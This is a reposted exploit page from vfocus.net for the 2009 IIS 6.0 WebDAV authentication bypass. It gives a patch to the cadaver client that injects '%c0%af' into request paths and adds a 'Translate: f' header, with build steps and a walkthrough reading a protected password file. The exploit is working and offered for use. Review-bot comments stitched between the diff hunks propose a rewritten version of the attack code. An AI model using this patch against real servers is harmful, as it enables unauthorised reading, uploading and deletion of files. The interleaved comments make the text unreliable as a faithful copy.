Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
来源:vfocus.net 作者:vfocus 发布时间:2009-05-22  
# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
# 
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# --snip--
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# --snip--
# > tar xzvf cadaver-0.23.2.tar.gz
# --snip--
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# --snip--
# > make
# --snip--
#
# Now we should have a patched, compiled version of cadaver. Start it
# against the server that was identified earlier as having a vulnerable
# folder (the patched client rewrites every request path, so only point
# it at the host you are testing):
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
# 
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/': succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt':
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
--- cadaver-0.23.2/lib/neon/ne_basic.c	2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c	2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
 	value = "infinity";
 	break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
 }
 
 static int copy_or_move(ne_session *sess, int is_move, int overwrite,
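Review bot: The `value` computed by the switch just above this hunk is now never read, because the added line hard-codes `"1"` as the Depth header; the switch is dead code and most compilers will warn about a set-but-unused variable. If the fixed depth is intentional, say so where it is forced, e.g. `/* bypass patch: always send Depth: 1, ignoring the depth the caller asked for */`, and drop or `#if 0` the switch so the two do not disagree silently. The enclosing function begins before this hunk, so the switch itself is outside the visible lines.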
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
--- cadaver-0.23.2/lib/neon/ne_request.c	2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c	2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
 }
 
 int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
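Review bot: The `Translate: f` header is now appended to every request the library builds, not only to requests aimed at the target, and nothing in the hunk records why it is there. A one-line comment on the added line would keep the next reader from removing it as noise, e.g. `/* IIS-specific: ask the server to return the file as-is rather than processing it — confirm against target */`, with the purpose hedged since this hunk does not show it. The function whose tail this hunk ends begins outside the visible lines.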
@@ -420,6 +421,7 @@
 ne_request *ne_request_create(ne_session *sess,
 			      const char *method, const char *path) 
 {
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
 
     req->session = sess;
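Review bot: The buffer size `strlen(path)+7` on the added line silently encodes the six bytes of `%c0%af` plus the terminator; if the inserted sequence is ever changed the write in the following hunk overflows. Spell the size out so it tracks the literal: `char *path2 = ne_calloc(strlen(path) + sizeof("%c0%af"));` (sizeof of the string literal already includes the NUL). The buffer is also allocated before the length check that decides whether it is used at all, which matters for the leak in the next hunk.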
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
 
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can't parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == '/')
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == '/')
 	req->uri = ne_concat(req->session->scheme, "://", 
-			     req->session->server.hostport, path, NULL);
+			     req->session->server.hostport, path2, NULL);
     else
-	req->uri = ne_strdup(path);
+	req->uri = ne_strdup(path2);
 
     {
 	struct hook *hk;
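Review bot: `path2` leaks on every request: both `ne_concat` and `ne_strdup` copy it into `req->uri` and the calloc'd buffer is never freed, and on the `else` branch `path2 = path;` additionally drops the allocation and assigns a `const char *` to a `char *`. Keep the heap buffer and the string actually used for the URI separate, free the buffer once `req->uri` owns its copy, and bound the format call. The rewrite below assumes `path2` is still declared at the top of the function as in the previous hunk; `ne_request_create` continues past this hunk.
```c
    /* … unchanged: req->method / method_is_head setup … */
    const char *uri_path = path;
    if (strlen(path) > 2) {
        /* Splice the overlong-UTF-8 slash after the first two bytes of the path. */
        snprintf(path2, strlen(path) + sizeof("%c0%af"), "%c%c%%c0%%af%s",
                 path[0], path[1], path + 2);
        uri_path = path2;
    }

    /* Only use an absoluteURI here when absolutely necessary: some
     * servers can't parse them. */
    if (req->session->use_proxy && !req->session->use_ssl && uri_path[0] == '/')
        req->uri = ne_concat(req->session->scheme, "://",
                             req->session->server.hostport, uri_path, NULL);
    else
        req->uri = ne_strdup(uri_path);
    free(path2);   /* req->uri holds its own copy; path2 may be unused but is always allocated */
```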
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
--- cadaver-0.23.2/lib/neon/ne_uri.c	2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c	2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
 /* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
 /*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
 /*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
 /*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
 /*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
 /*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,
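Review bot: Reclassifying 0x25 (`%`) from `PC` to `AL` in this table changes how every URI the library escapes or parses treats a percent sign, not just the spliced `%c0%af` sequence: a literal `%` in a user-supplied path will presumably no longer be percent-encoded, and existing `%XX` escapes are now passed through as ordinary characters. That is probably the intent here, but the table carries no trace of it; add a note on the changed row, e.g. `/* bypass patch: treat '%' as an ordinary char so the injected %c0%af survives ne_path_escape() — global side effect */`, so a later merge does not revert it as a typo.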

# [2009-05-21]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X Java applet Remote De
·VICIDIAL 2.0.5-173 (Auth Bypas
·Jorp 1.3.05.09 Remote Arbitrar
·ASP Inline Corporate Calendar
·bSpeak 1.10 (forumid) Remote B
·BaoFeng (config.dll) ActiveX R
·PHP Article Publisher Arbitrar
·ChinaGames (CGAgent.dll) Activ
·DMXReady Registration Manager
·Flash Quiz Beta 2 Multiple Re
·Realty Web-Base 1.0 (list_list
·Job Script 2.0 Arbitrary Shell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved